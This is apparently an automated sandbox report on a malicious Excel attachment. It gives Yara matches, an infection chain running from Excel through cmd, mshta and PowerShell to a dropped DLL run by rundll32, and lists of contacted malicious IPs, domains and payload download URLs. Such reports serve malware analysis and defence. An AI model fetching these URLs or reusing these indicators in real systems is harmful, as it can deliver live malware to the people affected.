Source: Yara match File source: 12.2.rundll32.exe.320000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2760000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2240000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.350000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3010000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.970000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.390000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2cc0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.970000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c50000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.29a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3140000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3140000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.ac0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3010000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.27c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.520000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2230000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.30c0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2ff0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.ac0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2970000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.520000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.ba0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.27c0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2150000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3080000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.29a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2260000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.510000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.537061746.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492601102.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.579636109.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576653540.0000000000390000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536803670.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577110015.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669986563.00000000026E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670479055.0000000002760000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622857750.0000000002CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.624483033.00000000000F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537034572.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622387369.0000000000510000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.540212353.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577244954.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.539580563.0000000000281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537177855.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622828914.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.625391904.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492742281.0000000000970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492939920.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536708009.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623018453.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.671485479.00000000000F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536836786.0000000000520000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576888194.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671162571.0000000002E01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492801629.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492763687.00000000009A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623060757.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492556885.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.496024597.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536761092.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.580171207.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.671569686.0000000000241000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.495195659.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577087851.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576691137.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622943286.0000000002DF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492993805.0000000003081000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537279993.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622728812.0000000000B51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669371583.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670922847.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536927980.0000000002151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622259827.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622336772.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622887543.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.679907402.0000000010001000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669408856.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577039067.0000000002611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669665448.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576994956.0000000002520000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536986069.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670955795.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671045532.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670983019.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536967344.0000000002230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492430821.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537148485.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492575732.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669801409.0000000002240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.579865047.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.493039467.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492634623.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.445805680.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576833262.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492653035.0000000000511000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.624624137.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.445776275.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577191264.0000000003140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622695663.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537237780.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622620372.0000000000A01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576449395.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.669457986.0000000000500000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.536787438.0000000000320000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622178465.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.445918549.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671246977.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576946958.0000000000C51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492898752.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.495115795.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576607361.0000000000311000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576860831.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671006733.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492968280.0000000003010000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622201770.0000000000191000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.539409355.00000000000F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670900460.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577214555.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537098802.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492877344.0000000002971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622232992.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562421 Sample: Attachment-2801.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 64 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->64 66 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->66 68 31 other IPs or domains 2->68 78 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->78 80 Multi AV Scanner detection for domain / URL 2->80 82 Found malware configuration 2->82 84 16 other signatures 2->84 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 62 C:\Users\user\Desktop\Attachment-2801.xls, Composite 15->62 dropped 76 Obfuscated command line found 15->76 19 cmd.exe 15->19         started        signatures6 process7 process8 21 mshta.exe 11 19->21         started        24 conhost.exe 19->24         started        26 rundll32.exe 1 19->26         started        dnsIp9 70 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 21->70 29 powershell.exe 12 7 21->29         started        34 rundll32.exe 24->34         started        90 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->90 signatures10 process11 dnsIp12 72 farmmash.com 89.184.68.240, 49167, 80 MIROHOSTWebhostingdatacenteranddomainnamesregistrati Ukraine 29->72 74 karensgardentips.com 107.190.142.107, 49168, 80 DIMENOCUS United States 29->74 60 C:\ProgramData\QWER.dll, PE32 29->60 dropped 94 Powershell drops PE file 29->94 36 cmd.exe 29->36         started        38 rundll32.exe 1 34->38         started        file13 signatures14 process15 signatures16 41 rundll32.exe 36->41         started        88 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->88 43 rundll32.exe 38->43         started        process17 process18 45 rundll32.exe 1 41->45         started        49 rundll32.exe 43->49         started        file19 58 C:\Windows\SysWOW64\...\nybbbfj.sgf (copy), PE32 45->58 dropped 92 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->92 51 rundll32.exe 45->51         started        signatures20 process21 process22 53 rundll32.exe 1 51->53         started        signatures23 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 53->86 56 rundll32.exe 53->56         started        process24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.148.81.119
 unknown United States
20473 AS-CHOOPAUS true
104.131.62.48
 unknown United States
14061 DIGITALOCEAN-ASNUS true
198.199.98.78
 unknown United States
14061 DIGITALOCEAN-ASNUS true
194.9.172.107
 unknown unknown
207992 FEELBFR true
59.148.253.194
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK true
74.207.230.120
 unknown United States
63949 LINODE-APLinodeLLCUS true
103.41.204.169
 unknown Indonesia
58397 INFINYS-AS-IDPTInfinysSystemIndonesiaID true
85.214.67.203
 unknown Germany
6724 STRATOSTRATOAGDE true
191.252.103.16
 unknown Brazil
27715 LocawebServicosdeInternetSABR true
168.197.250.14
 unknown Argentina
264776 OmarAnselmoRipollTDCNETAR true
185.148.168.15
 unknown Germany
44780 EVERSCALE-ASDE true
66.42.57.149
 unknown United States
20473 AS-CHOOPAUS true
91.240.118.168
 unknown unknown
49453 GLOBALLAYERNL true
139.196.72.155
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
217.182.143.207
 unknown France
16276 OVHFR true
203.153.216.46
 unknown Indonesia
45291 SURF-IDPTSurfindoNetworkID true
159.69.237.188
 unknown Germany
24940 HETZNER-ASDE true
116.124.128.206
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
37.59.209.141
 unknown France
16276 OVHFR true
78.46.73.125
 unknown Germany
24940 HETZNER-ASDE true
210.57.209.142
 unknown Indonesia
38142 UNAIR-AS-IDUniversitasAirlanggaID true
107.190.142.107
 karensgardentips.com United States
33182 DIMENOCUS false
185.148.168.220
 unknown Germany
44780 EVERSCALE-ASDE true
54.37.228.122
 unknown France
16276 OVHFR true
185.168.130.138
 unknown Ukraine
49720 GIGACLOUD-ASUA true
190.90.233.66
 unknown Colombia
18678 INTERNEXASAESPCO true
142.4.219.173
 unknown Canada
16276 OVHFR true
54.38.242.185
 unknown France
16276 OVHFR true
89.184.68.240
 farmmash.com Ukraine
28907 MIROHOSTWebhostingdatacenteranddomainnamesregistrati true
195.154.146.35
 unknown France
12876 OnlineSASFR true
195.77.239.39
 unknown Spain
60493 FICOSA-ASES true
78.47.204.80
 unknown Germany
24940 HETZNER-ASDE true
118.98.72.86
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
37.44.244.177
 unknown Germany
47583 AS-HOSTINGERLT true
62.171.178.147
 unknown United Kingdom
51167 CONTABODE true
128.199.192.135
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
farmmash.com 89.184.68.240 true
karensgardentips.com 107.190.142.107 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://farmmash.com/edh2fa/g2Q7Qbgs/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/oo/aa/se.png true
  • Avira URL Cloud: malware
 unknown
http://karensgardentips.com/cgi-bin/hfpv/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/oo/aa/se.html true
  • Avira URL Cloud: malware
 unknown